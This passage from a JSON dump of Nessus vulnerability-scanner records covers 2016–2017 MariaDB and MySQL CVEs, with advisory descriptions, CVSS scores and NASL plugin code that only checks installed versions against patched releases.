denial of service condition. 
(CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. 
An authenticated, remote attacker can\n exploit this to cause a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5552-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-5552-changelog/\");\n # https://mariadb.com/resources/blog/update-on-security-vulnerabilities-cve-2016-6663-and-cve-2016-6664-related-to-mariadb-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fefde198\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.52 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6663\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.52-MariaDB', min:'5.5', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T04:03:54", "description": "The version of MariaDB running on the remote host is 10.1.x prior to\n10.1.18. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. 
An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. An authenticated, remote attacker can\n exploit this to cause a denial of service condition.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_10_1_18.NASL", "href": "https://www.tenable.com/plugins/nessus/95632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95632);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3492\",\n \"CVE-2016-5616\",\n \"CVE-2016-5624\",\n \"CVE-2016-5626\",\n \"CVE-2016-5629\",\n \"CVE-2016-6663\",\n \"CVE-2016-8283\"\n );\n script_bugtraq_id(\n 92911,\n 93614,\n 93635,\n 93638,\n 93650,\n 93668,\n 93737\n );\n\n script_name(english:\"MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 10.1.x prior to\n10.1.18. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. 
(CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. 
An authenticated, remote attacker can\n exploit this to cause a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-10118-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-10118-changelog/\");\n # https://mariadb.com/resources/blog/update-on-security-vulnerabilities-cve-2016-6663-and-cve-2016-6664-related-to-mariadb-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fefde198\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 10.1.18 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6663\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'10.1.18-MariaDB', min:'10.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:48:07", "description": "The MySQL project reports :\n\n- CVE-2016-3492: Remote security vulnerability in 'Server: Optimizer'\nsub component.\n\n- CVE-2016-5616, CVE-2016-6663: Race condition allows local users with\ncertain permissions to gain privileges by leveraging use of\nmy_copystat by REPAIR TABLE to repair a MyISAM table.\n\n- CVE-2016-5617, CVE-2016-6664: mysqld_safe, when using file-based\nlogging, allows local users with access to the mysql account to gain\nroot privileges via a symlink attack on error logs and possibly other\nfiles.\n\n- CVE-2016-5624: Remote security vulnerability in 'Server: DML' sub\ncomponent.\n\n- CVE-2016-5626: Remote security vulnerability in 'Server: GIS' sub\ncomponent.\n\n- CVE-2016-5629: Remote security vulnerability in 'Server: Federated'\nsub component.\n\n- CVE-2016-8283: Remote security vulnerability in 'Server: Types' sub\ncomponent.", "edition": 28, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-16T00:00:00", "title": "FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "modified": "2017-01-16T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql56-server", "p-cpe:/a:freebsd:freebsd:mariadb100-server", "p-cpe:/a:freebsd:freebsd:mariadb100-client", 
"p-cpe:/a:freebsd:freebsd:mariadb55-client", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:mysql56-client", "p-cpe:/a:freebsd:freebsd:mysql55-client", "p-cpe:/a:freebsd:freebsd:mariadb101-client", "p-cpe:/a:freebsd:freebsd:percona55-server", "p-cpe:/a:freebsd:freebsd:mysql55-server", "p-cpe:/a:freebsd:freebsd:mysql57-client", "p-cpe:/a:freebsd:freebsd:percona55-client", "p-cpe:/a:freebsd:freebsd:percona56-client", "p-cpe:/a:freebsd:freebsd:mariadb101-server", "p-cpe:/a:freebsd:freebsd:percona56-server", "p-cpe:/a:freebsd:freebsd:mysql57-server", "p-cpe:/a:freebsd:freebsd:mariadb55-server"], "id": "FREEBSD_PKG_22373C43D72811E6A9A5B499BAEBFEAF.NASL", "href": "https://www.tenable.com/plugins/nessus/96510", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96510);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3492\", \"CVE-2016-5616\", \"CVE-2016-5617\", \"CVE-2016-5624\", \"CVE-2016-5626\", \"CVE-2016-5629\", \"CVE-2016-6663\", \"CVE-2016-6664\", \"CVE-2016-8283\");\n\n script_name(english:\"FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MySQL project reports :\n\n- CVE-2016-3492: Remote security vulnerability in 'Server: Optimizer'\nsub component.\n\n- CVE-2016-5616, CVE-2016-6663: Race condition allows local users with\ncertain permissions to gain privileges by leveraging use of\nmy_copystat by REPAIR TABLE to repair a MyISAM table.\n\n- CVE-2016-5617, CVE-2016-6664: mysqld_safe, when using file-based\nlogging, allows local users with access to the mysql account to gain\nroot privileges via a symlink attack on error logs and possibly other\nfiles.\n\n- CVE-2016-5624: Remote security vulnerability in 'Server: DML' sub\ncomponent.\n\n- CVE-2016-5626: Remote security 
vulnerability in 'Server: GIS' sub\ncomponent.\n\n- CVE-2016-5629: Remote security vulnerability in 'Server: Federated'\nsub component.\n\n- CVE-2016-8283: Remote security vulnerability in 'Server: Types' sub\ncomponent.\"\n );\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1ad1fd2e\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10028-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10028-release-notes/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5552-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5552-release-notes/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10118-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10118-release-notes/\"\n );\n # https://vuxml.freebsd.org/freebsd/22373c43-d728-11e6-a9a5-b499baebfeaf.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cc418265\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-client\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb101-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb101-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql57-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql57-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-client<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-server<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-client<10.0.28\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-server<10.0.28\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb101-client<10.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb101-server<10.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-client<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-server<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-client<5.6.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-server<5.6.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql57-client<5.7.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql57-server<5.7.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-client<5.5.51.38.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-server<5.5.51.38.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-client<5.6.32.78.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-server<5.6.32.78.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, 
"vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:58", "description": "New mariadb packages are available for Slackware 14.1, 14.2, and\n-current to fix security issues.", "edition": 23, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-19T00:00:00", "title": "Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-01-19T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:mariadb"], "id": "SLACKWARE_SSA_2017-018-01.NASL", "href": "https://www.tenable.com/plugins/nessus/96612", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-018-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96612);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_xref(name:\"SSA\", value:\"2017-018-01\");\n\n script_name(english:\"Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mariadb packages are available for Slackware 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435634\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48ee8594\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:slackware:slackware_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"mariadb\", pkgver:\"5.5.54\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mariadb\", pkgver:\"5.5.54\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"mariadb\", pkgver:\"10.0.29\", 
pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:32:11", "description": "This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 